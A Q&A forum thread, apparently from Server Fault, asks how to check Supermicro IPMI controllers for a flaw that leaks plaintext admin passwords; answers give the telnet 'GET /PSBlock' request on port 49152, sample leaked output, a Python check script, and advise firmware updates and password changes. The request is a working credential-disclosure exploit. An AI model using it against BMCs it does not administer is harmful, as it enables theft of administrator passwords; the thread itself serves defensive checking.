10

I have some Supermicro servers with IPMI running, and as described in this blog (http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras), there's a critical vulnerability that allows getting plaintext admin passwords from any remote location.

How can I check if my server motherboard is compromised?

Vinícius Ferrão

1 Answer

13

Simply telnet to the IPMI IP address on port 49152 and do a specific GET request. You should get your users and passwords if you're compromised.

telnet server.example.com 49152

After connecting, ask for GET /PSBlock and watch the results; it should be something like this:

Trying 192.168.1.22...
Connected to server.example.com.
Escape character is '^]'.
GET /PSBlock

Answer:

=%}?
0adminADMIN**yourPlaintextPasswordHere**;TTroot**AnotherPassword**???%?v?i?o???DDD@??

To solve this issue, update the IPMI firmware to the latest version. The firmware is specific to your IPMI controller, so you should get the one specified on the Supermicro website.

Then, after updating the firmware, change your passwords.

Gene
Vinícius Ferrão
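The manual telnet check from the answer above, as an added example that is not part of the original post: a Python script that sends the same request to one BMC you administer and reports only whether data came back, so the passwords never reach terminal scrollback. The verdict names, the size cap, and the handling of an HTTP status line or HTML page are assumptions, not documented Supermicro behaviour.

```python
import socket
import sys

PORT = 49152                       # port given in the answer
REQUEST = b"GET /PSBlock\r\n\r\n"  # request the answer types into telnet
MAX_BYTES = 65536                  # assumed cap; we only need to know data came back


def fetch(host, port=PORT, timeout=5.0):
    """Return the raw reply bytes, or None if the port cannot be reached."""
    try:
        sock = socket.create_connection((host, port), timeout=timeout)
    except OSError:
        return None
    reply = b""
    with sock:
        try:
            sock.sendall(REQUEST)
            while len(reply) < MAX_BYTES:
                chunk = sock.recv(4096)
                if not chunk:
                    break
                reply += chunk
        except OSError:
            pass  # timeout or reset: classify whatever arrived
    return reply


def classify(reply):
    """Map a reply to a verdict string; the reply itself is never echoed."""
    if reply is None:
        return "unreachable"
    body = reply.lstrip()
    if body[:5].upper() == b"HTTP/":
        # Assumption: if the service sends a status line, only 200 carries the file.
        if body.split(None, 2)[1:2] != [b"200"]:
            return "http-error"
        body = body.partition(b"\r\n\r\n")[2].lstrip()
    if not body:
        return "no-data"
    if body[:1] == b"<":
        return "html-page"  # assumption: markup is an error page, not the block
    return "data-returned"


if __name__ == "__main__":
    if len(sys.argv) != 2:
        sys.exit("usage: psblock_check.py <bmc-host>")
    verdict = classify(fetch(sys.argv[1]))
    print(f"{sys.argv[1]}:{PORT} -> {verdict}")
    # Exit status 1 flags a BMC that needs the firmware update and new passwords.
    sys.exit(1 if verdict == "data-returned" else 0)
```

Run it again after the firmware update; anything other than `data-returned` means the request no longer yields the block.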